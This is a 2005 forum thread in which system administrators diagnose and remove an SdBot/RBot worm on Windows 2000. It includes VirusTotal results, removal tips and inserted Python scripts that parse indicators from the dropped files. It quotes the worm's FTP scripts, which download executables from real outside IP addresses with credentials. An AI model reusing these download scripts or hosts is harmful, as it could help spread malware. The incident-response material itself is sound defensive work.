New virus/worm? mousebm.exe, eraseme_XXXXX.exe and svnlitup32.exe

Discussion in 'Virus Information' started by Thomas Cameron, Aug 16, 2005.

  1. All -

    I have a Windows 2000 server which somehow got connected to the 'Net
    without AV software on it. Now there is a new "service" called "Mouse
    Button Monitor" which is controlled by %windir%\system32\mousebm.exe.
    I also found the following files in %windir%\system32 which appear to
    be new:

    08/15/2005 09:00p 8,201 .exe
    08/15/2005 12:42p 1,518 eq
    08/15/2005 11:28a 0 eraseme_61087.exe
    08/15/2005 11:28a 71 i
    08/15/2005 08:39a 8,201 mousebm.exe
    08/14/2005 04:00p 0 svnlitup32.exe

    The file called ".exe" has the system and hidden attributes set.

    I deleted the files from system32 but they re-appear after a reboot. I
    try to stop the "Mouse Button Monitor" using "net stop mousebm /y" and
    I get:

    C:\DOCUME~1\ADMINI~1\Desktop>net stop mousebm /y
    The requested pause or stop is not valid for this service.

    More help is available by typing NET HELPMSG 2191.

    The stop and pause buttons are greyed out for the "Mouse Button
    Monitor" service.

    The file "i" contains entries like this:

    open 24.173.15.63 16670
    user 1 1
    get eraseme_61087.exe
    quit

    The file "eq" contains pages and pages of entries which look like this:

    open 24.173.252.20 10082
    user 23107 28392
    get svnlitup32.exe
    quit
    open 24.173.144.52 1317
    user 17789 4406
    get svnlitup32.exe
    quit
    open 24.173.2.21 30380
    user 31975 3371
    get svnlitup32.exe
    quit
    open 24.173.2.116 14953
    user 16493 3501
    get svnlitup32.exe
    quit

    I grabbed the latest McAfee SuperDAT and extracted it. I ran scan.exe
    from the command line like this:

    scan c:\ /all /sub /clean /log c:\vscan.log

    It reported no viruses.

    Every time I try to install McAfee on the machine, I get an error
    saying "The Windows Installer Service could not be accessed. This can
    occur if you are running Windows in safe mode, or if the Windows
    installer is not correctly installed. Contact your support personnel
    for assistance."

    I think I'm screwed. This sound familiar to anyone?

    Thomas
     
    Thomas Cameron, Aug 16, 2005
    #1
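The "i" and "eq" files above are the interesting part of the drop: each is a command script for the Windows ftp client (the `open host port` / `user name pass` / `get file` / `quit` sequence), so every block names a server, a credential pair and a filename worth hunting for on the rest of the network. The parser below is an added example, not code from the thread or from any vendor tool. The sample scripts are the lines quoted in the post; the open/user/get/quit grammar, the `eraseme_<digits>.exe` naming pattern (the same shape turns up again in post #10 as eraseme_43263.exe) and the "one credential pair per server" heuristic are my reading of them, not something the page states.

```python
"""Extract download IOCs from the FTP command scripts an SdBot-style worm
drops next to itself (the "i" and "eq" files in the thread).

Added example, not code from the thread. The two sample scripts are the
lines quoted in post #1; the grammar (open/user/get/quit, as accepted by
ftp.exe -s:script) and the heuristics are assumptions made here.
"""
import re
from collections import namedtuple

Download = namedtuple("Download", "host port user password filename")

# Sample input: contents of the "i" and "eq" files as quoted in the post.
I_SCRIPT = """open 24.173.15.63 16670
user 1 1
get eraseme_61087.exe
quit
"""

EQ_SCRIPT = """open 24.173.252.20 10082
user 23107 28392
get svnlitup32.exe
quit
open 24.173.144.52 1317
user 17789 4406
get svnlitup32.exe
quit
open 24.173.2.21 30380
user 31975 3371
get svnlitup32.exe
quit
open 24.173.2.116 14953
user 16493 3501
get svnlitup32.exe
quit
"""

# eraseme_<digits>.exe is the per-host random name seen in posts #1 and #10;
# treating any such name as suspicious is an assumption.
ERASEME_RE = re.compile(r"^eraseme_\d+\.exe$", re.IGNORECASE)


def parse_ftp_script(text):
    """Walk an ftp.exe -s: style script and return one Download per
    open/user/get sequence. Tolerates a missing 'user' line (anonymous)
    and several 'get' lines under one 'open'; resets state on 'quit'."""
    downloads = []
    host = port = user = password = None
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            host = args[0]
            port = int(args[1]) if len(args) > 1 else 21  # ftp default port
            user = password = None
        elif cmd == "user":
            user = args[0] if args else None
            password = args[1] if len(args) > 1 else None
        elif cmd == "get" and args and host:
            downloads.append(Download(host, port, user, password, args[0]))
        elif cmd in ("quit", "bye"):
            host = port = user = password = None
    return downloads


def summarize(downloads):
    """Collapse Downloads into what a responder acts on: servers to block at
    the firewall, filenames to sweep for, and whether the credentials look
    generated per server (every server gets a different user/pass pair)."""
    servers = sorted({(d.host, d.port) for d in downloads})
    files = sorted({d.filename for d in downloads})
    creds = {(d.user, d.password) for d in downloads}
    return {
        "servers": servers,
        "filenames": files,
        "eraseme_names": [f for f in files if ERASEME_RE.match(f)],
        "distinct_credentials": len(creds),
        "random_credentials": len(servers) > 1 and len(creds) == len(servers),
    }


if __name__ == "__main__":
    for name, script in (("i", I_SCRIPT), ("eq", EQ_SCRIPT)):
        print(name, summarize(parse_ftp_script(script)))
```

Run against the two scripts, "i" yields a single server with the throwaway `1`/`1` login and the eraseme_ name, while "eq" yields four servers on high, non-standard ports, each with its own numeric user/pass pair and all fetching the same svnlitup32.exe; the (host, port) list is what ggillies' firewall-log correlation later in the thread needs.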

  2. GeorgeSam1 Guest

    I have the same thing. Been fighting it all day. On w2k only. I have XP
    and w2k3 but no hits there. I renamed the exe in winnt folder and saved
    a different .exe there with the same name. Deleted mousebm entries in
    the registry. Applied all the current maintenance fixes from microsoft.
    Haven't seen it in hours .. So I think I have it removed now.

    I think it's a new worm.. It will traverse your network..
     
    GeorgeSam1, Aug 16, 2005
    #2

  3. GeorgeSam1 Guest

    I also found a .exe running.. no name, just .exe. It is the same exe
    as mousebm.exe. Did the same thing as with mousebm.exe.
     
    GeorgeSam1, Aug 16, 2005
    #3
  4. GeorgeSam1 Guest

    You can terminate the process from the Task Manager... but you can use
    .... this Process Explorer..
    http://www.sysinternals.com/Utilities/ProcessExplorer.html
     
    GeorgeSam1, Aug 16, 2005
    #4
  5. Unplugged Guest

    Fought it all day, too. Targeted ten suspect PCs using port scans and
    found five with active infections. I was able to disable the first one
    with AutoRuns and then kill it with Process Explorer (both from
    Sysinternals). Sent a sample to SARC who immediately identified it as
    W32.IRCBot. I have a problem with that as it behaves more like a Zotob
    variant, but we'll see what Tuesday brings. I didn't get to the last
    two PCs until late this evening and found them to be infected with a
    more resistant strain. Logged in as local admin, but SAVCE 8.0 with
    the latest rapidrelease updates could only detect but not clean or
    quarantine. Attempts to kill the process using AutoRuns or Process
    Explorer (from Sysinternals.com) were denied. Efforts to boot to safe
    mode or safe mode with command prompt hung every time. I didn't have my
    copy of HJT with me and it was late, so I'll be returning to those PCs.
    Hopefully tomorrow will be a better day!
     
    Unplugged, Aug 16, 2005
    #5
  6. From: "Thomas Cameron" <>

    | All -
    |
    | I have a Windows 2000 server which somehow got connected to the 'Net
    | without AV software on it. Now there is a new "service" called "Mouse
    | Button Monitor" which is controlled by %windir%\system32\mousebm.exe.
    | I also found the following files in %windir%\system32 which appear to
    | be new:
    < snip >

    Please submit a sample of the EXE file(s) to Virus Total --
    http://www.virustotal.com/flash/index_en.html
    The submission(s) will then be tested against many different AV vendors' scanners.
    That will give you an idea what it is and who recognizes it. In addition, unless told
    otherwise, Virus Total will provide the sample to all participating vendors.

    When you get the report, please post back the exact results.
     
    David H. Lipman, Aug 16, 2005
    #6
  7. Additionally, is anyone else seeing ports 6000-6003 listening on a
    compromised machine?
     
    Thomas Cameron, Aug 16, 2005
    #7
  8. onebrother Guest

    One option that I tried was to deny permissions to the file so that it
    doesn't run @ all...

    That seems to do the trick but I want to get rid of it...
     
    onebrother, Aug 16, 2005
    #8
  9. From: <>

    | One option that I tried was to deny permissions to the file so that it
    | doesn't run @ all...
    |
    | That seems to do the trick but I want to get rid of it...

    We need to know what it is !

    Please submit a sample ASAP to Virus Total --
    http://www.virustotal.com/flash/index_en.html
    The submission will then be tested against many different AV vendors' scanners.
    That will give you an idea what it is and who recognizes it. In addition, unless told
    otherwise, Virus Total will provide the sample to all participating vendors.

    When you get the report, please post back the exact results.
     
    David H. Lipman, Aug 16, 2005
    #9
  10. ggillies Guest

    We had the same issue on a W2K server Monday. Here are the Virustotal
    scan reports on 2 of the files (eraseme_43263.exe and i.exe on our
    case) Nothing was found in the others (mousebm.exe and winsvc32.exe)

    Antivirus Version Update Result
    AntiVir 6.31.1.0 08.16.2005 no virus found
    Avast 4.6.695.0 08.16.2005 no virus found
    AVG 718 08.15.2005 no virus found
    Avira 6.31.1.0 08.16.2005 no virus found
    BitDefender 7.0 08.16.2005 Backdoor.SDBot.33E8D99B
    CAT-QuickHeal 7.03 08.16.2005 Backdoor.SdBot.adj
    ClamAV devel-20050725 08.16.2005 no virus found
    DrWeb 4.32b 08.16.2005 no virus found
    eTrust-Iris 7.1.194.0 08.16.2005 no virus found
    eTrust-Vet 11.9.1.0 08.16.2005 no virus found
    Fortinet 2.41.0.0 08.16.2005 PossibleThreat
    F-Prot 3.16c 08.16.2005 no virus found
    Ikarus 0.2.59.0 08.16.2005 no virus found
    Kaspersky 4.0.2.24 08.16.2005 Backdoor.Win32.SdBot.adj
    McAfee 4559 08.16.2005 W32/Sdbot.worm.gen.h
    NOD32v2 1.1195 08.16.2005 a variant of IRC/SdBot
    Norman 5.70.10 08.16.2005 no virus found
    Panda 8.02.00 08.16.2005 no virus found
    Sophos 3.96.0 08.16.2005 W32/Rbot-ALA
    Sybari 7.5.1314 08.16.2005 W32/Sdbot.worm.gen.h
    Symantec 8.0 08.16.2005 W32.Spybot.Worm
    TheHacker 5.8.2.089 08.16.2005 no virus found
    VBA32 3.10.4 08.16.2005 suspected of Embedded.Backdoor.Win32.SdBot.zo



    Antivirus Version Update Result
    AntiVir 6.31.1.0 08.16.2005 no virus found
    Avast 4.6.695.0 08.16.2005 no virus found
    AVG 718 08.15.2005 no virus found
    Avira 6.31.1.0 08.16.2005 no virus found
    BitDefender 7.0 08.16.2005 Backdoor.BotGet.FtpB.Gen
    CAT-QuickHeal 7.03 08.16.2005 no virus found
    ClamAV devel-20050725 08.16.2005 Trojan.Downloader.FTP.Gen-4
    DrWeb 4.32b 08.16.2005 no virus found
    eTrust-Iris 7.1.194.0 08.16.2005 no virus found
    eTrust-Vet 11.9.1.0 08.16.2005 no virus found
    Fortinet 2.41.0.0 08.16.2005 BAT/Dloader.AB-net
    F-Prot 3.16c 08.16.2005 no virus found
    Ikarus 0.2.59.0 08.16.2005 no virus found
    Kaspersky 4.0.2.24 08.16.2005 Trojan-Downloader.BAT.Ftp.ab
    McAfee 4559 08.16.2005 W32/Sdbot.worm!ftp
    NOD32v2 1.1195 08.16.2005 no virus found
    Norman 5.70.10 08.16.2005 Text/BotFTP.gen
    Panda 8.02.00 08.16.2005 W32/Sdbot.ftp
    Sophos 3.96.0 08.16.2005 no virus found
    Sybari 7.5.1314 08.16.2005 Trojan-Downloader.BAT.Ftp.ab
    Symantec 8.0 08.16.2005 no virus found
    TheHacker 5.8.2.089 08.16.2005 Trojan/Downloader-bat
    VBA32 3.10.4 08.16.2005 no virus found

    We stopped it by closing port 445. Also disabled the SNMP service as
    requested by our network admin. Been OK since then, although we have
    been seeing repeated connection attempts in the firewall log to port
    445 from the same IP number found in one of the files we removed.

    George
     
    ggillies, Aug 16, 2005
    #10
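Two multi-engine reports like the ones above are read as a whole, not by picking one vendor's label: the detection ratio says how widely the sample is known, and the overlap between vendor names (SdBot, Rbot, Spybot and IRC/SdBot all describe one IRC-bot family; BotGet.FtpB, Downloader.FTP, BAT/Dloader and BotFTP all describe an FTP download script) is what justifies calling the pair "an SdBot/RBot variant plus its FTP script". The script below is an added example, not code from the thread or from VirusTotal. The two report texts are the tables pasted in the post, embedded verbatim as sample input; the row format and the keyword-to-family table are my assumptions.

```python
"""Read a pasted multi-engine (VirusTotal-style) report as a whole:
detection ratio plus a family consensus across vendors' naming schemes.

Added example, not code from the thread or from VirusTotal. REPORT_1 and
REPORT_2 are the two tables pasted in post #10 (the post names the files
as eraseme_43263.exe and i.exe; the BAT/FTP labels in the second table
fit the FTP-script role of "i" in post #1, but which table is which file
is an inference, not a statement from the page).
"""
import re
from collections import Counter

# One report row as pasted: engine, version, update date, result text.
ROW_RE = re.compile(
    r"^(?P<engine>\S+)\s+(?P<version>\S+)\s+(?P<update>\d{2}\.\d{2}\.\d{4})\s+(?P<result>.+?)\s*$"
)
CLEAN_RESULT = "no virus found"

# Assumed mapping from vendor name fragments to a neutral family label.
# Component-specific fragments (the FTP script) are checked first so that a
# name such as "Sdbot.worm!ftp" is attributed to the script, not the bot.
FAMILY_KEYWORDS = (
    (("ftp", "dloader", "downloader"), "ftp downloader script"),
    (("sdbot", "rbot", "spybot", "ircbot"), "irc bot (SdBot/Rbot)"),
)

REPORT_1 = """Antivirus Version Update Result
AntiVir 6.31.1.0 08.16.2005 no virus found
Avast 4.6.695.0 08.16.2005 no virus found
AVG 718 08.15.2005 no virus found
Avira 6.31.1.0 08.16.2005 no virus found
BitDefender 7.0 08.16.2005 Backdoor.SDBot.33E8D99B
CAT-QuickHeal 7.03 08.16.2005 Backdoor.SdBot.adj
ClamAV devel-20050725 08.16.2005 no virus found
DrWeb 4.32b 08.16.2005 no virus found
eTrust-Iris 7.1.194.0 08.16.2005 no virus found
eTrust-Vet 11.9.1.0 08.16.2005 no virus found
Fortinet 2.41.0.0 08.16.2005 PossibleThreat
F-Prot 3.16c 08.16.2005 no virus found
Ikarus 0.2.59.0 08.16.2005 no virus found
Kaspersky 4.0.2.24 08.16.2005 Backdoor.Win32.SdBot.adj
McAfee 4559 08.16.2005 W32/Sdbot.worm.gen.h
NOD32v2 1.1195 08.16.2005 a variant of IRC/SdBot
Norman 5.70.10 08.16.2005 no virus found
Panda 8.02.00 08.16.2005 no virus found
Sophos 3.96.0 08.16.2005 W32/Rbot-ALA
Sybari 7.5.1314 08.16.2005 W32/Sdbot.worm.gen.h
Symantec 8.0 08.16.2005 W32.Spybot.Worm
TheHacker 5.8.2.089 08.16.2005 no virus found
VBA32 3.10.4 08.16.2005 suspected of Embedded.Backdoor.Win32.SdBot.zo
"""

REPORT_2 = """Antivirus Version Update Result
AntiVir 6.31.1.0 08.16.2005 no virus found
Avast 4.6.695.0 08.16.2005 no virus found
AVG 718 08.15.2005 no virus found
Avira 6.31.1.0 08.16.2005 no virus found
BitDefender 7.0 08.16.2005 Backdoor.BotGet.FtpB.Gen
CAT-QuickHeal 7.03 08.16.2005 no virus found
ClamAV devel-20050725 08.16.2005 Trojan.Downloader.FTP.Gen-4
DrWeb 4.32b 08.16.2005 no virus found
eTrust-Iris 7.1.194.0 08.16.2005 no virus found
eTrust-Vet 11.9.1.0 08.16.2005 no virus found
Fortinet 2.41.0.0 08.16.2005 BAT/Dloader.AB-net
F-Prot 3.16c 08.16.2005 no virus found
Ikarus 0.2.59.0 08.16.2005 no virus found
Kaspersky 4.0.2.24 08.16.2005 Trojan-Downloader.BAT.Ftp.ab
McAfee 4559 08.16.2005 W32/Sdbot.worm!ftp
NOD32v2 1.1195 08.16.2005 no virus found
Norman 5.70.10 08.16.2005 Text/BotFTP.gen
Panda 8.02.00 08.16.2005 W32/Sdbot.ftp
Sophos 3.96.0 08.16.2005 no virus found
Sybari 7.5.1314 08.16.2005 Trojan-Downloader.BAT.Ftp.ab
Symantec 8.0 08.16.2005 no virus found
TheHacker 5.8.2.089 08.16.2005 Trojan/Downloader-bat
VBA32 3.10.4 08.16.2005 no virus found
"""


def parse_report(text):
    """Return [(engine, result-or-None)]; header and blank lines are skipped
    because they lack the dd.mm.yyyy update column."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        result = m.group("result")
        rows.append((m.group("engine"), None if result.lower() == CLEAN_RESULT else result))
    return rows


def classify(result):
    """Map one vendor's detection name onto the assumed family table."""
    low = result.lower()
    for fragments, family in FAMILY_KEYWORDS:
        if any(f in low for f in fragments):
            return family
    return "generic / unclassified"


def consensus(rows):
    """Detection ratio and the family most vendors agree on."""
    hits = [(engine, result) for engine, result in rows if result is not None]
    families = Counter(classify(result) for _, result in hits)
    top_family, top_count = families.most_common(1)[0] if families else (None, 0)
    return {
        "engines": len(rows),
        "detections": len(hits),
        "families": families,
        "top_family": top_family,
        "agreement": top_count / len(hits) if hits else 0.0,
    }


if __name__ == "__main__":
    for name, text in (("table 1", REPORT_1), ("table 2", REPORT_2)):
        c = consensus(parse_report(text))
        print(f"{name}: {c['detections']}/{c['engines']} engines flag it; "
              f"consensus {c['top_family']!r} ({c['agreement']:.0%} of hits)")
```

For the first table this gives 10 of 23 engines, nine of them naming the SdBot/Rbot/Spybot family and one a generic "PossibleThreat"; for the second, 9 of 23, all of them describing an FTP download script. A fresh variant that only a third to a half of engines recognise, with the rest saying "no virus found", is exactly why the McAfee command-line scan in post #1 came back clean.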
  11. x96bell3 Guest

    I ran into this problem yesterday. Some jerk from France was all over
    my box... Initially the file causing the problem was smsc.exe and then
    I got infected with mousebm.exe. I have reported the variants to Trend
    Micro and Symantec....

    Removal instructions:

    Search your registry and remove all references to mousebm.exe and
    smsc.exe. I noticed that some of the keys had permissions set on them,
    so you may need to reset the permissions using regedt32.

    You can't delete the file and I was unable to stop the process;
    however, I was able to rename the files, so I renamed them to bob.bad.

    I then wrote a batch file to delete the bob.bad files and the original
    names of the files.

    I called that batch file from the Run reg key and rebooted my system.

    After the reboot I installed the latest updates from
    http://Windowsupdate.microsoft.com

    Note: while the virus was running I was unable to install any
    updates...

    Peace
     
    x96bell3, Aug 16, 2005
    #11
  12. x96bell3 Guest

    Oh yeah, I used Sniffer to view the traffic and TCPView from
    http://sysinternals.com to do a traffic-to-process mapping...
     
    x96bell3, Aug 16, 2005
    #12
  13. From: <>

    |
    | We had the same issue on a W2K server Monday. Here are the Virustotal
    | scan reports on 2 of the files (eraseme_43263.exe and i.exe on our
    | case) Nothing was found in the others (mousebm.exe and winsvc32.exe)
    |

    < snip >

    | McAfee 4559 08.16.2005 W32/Sdbot.worm.gen.h
    | Sophos 3.96.0 08.16.2005 W32/Rbot-ALA
    | McAfee 4559 08.16.2005 W32/Sdbot.worm!ftp

    < snip >


    Well there ya' go, an SDBot/RBot variant!
    The McAfee and Sophos modules, from the below utility, should clean this.


    Download MULTI_AV.EXE from the URL --
    http://www.ik-cs.com/programs/virtools/Multi_AV.exe

    It is a self-extracting ZIP file that contains the Kixtart Script Interpreter
    { http://kixtart.org Kixtart is CareWare }, three batch files, five Kixtart scripts, one Link
    (.LNK) file, a PDF instruction file and two utilities: UNZIP.EXE and WGET.EXE. It will
    simplify the process of using the Sophos, Trend and McAfee Anti Virus Command Line Scanners to
    remove viruses, Trojans and various other malware.

    C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
    This will bring up the initial menu of choices and should be executed in Normal Mode. This
    way all the components can be downloaded from each AV vendor’s web site.
    The choices are; Sophos, Trend, McAfee, Exit the menu and Reboot the PC.

    You can choose to go to each menu item and just download the needed files or you can
    download the files and perform a scan in Normal Mode. Once you have downloaded the files
    needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
    during boot] and re-run the menu again and choose which scanner you want to run in Safe
    Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

    When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
    file.

    To use this utility, perform the following...
    Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
    Choose; Unzip
    Choose; Close

    Execute; C:\AV-CLS\StartMenu.BAT
    { or Double-click on 'Start Menu' in C:\AV-CLS }

    NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
    FireWall to allow it to download the needed AV vendor related files.

    * * * Please report back your results * * *
     
    David H. Lipman, Aug 16, 2005
    #13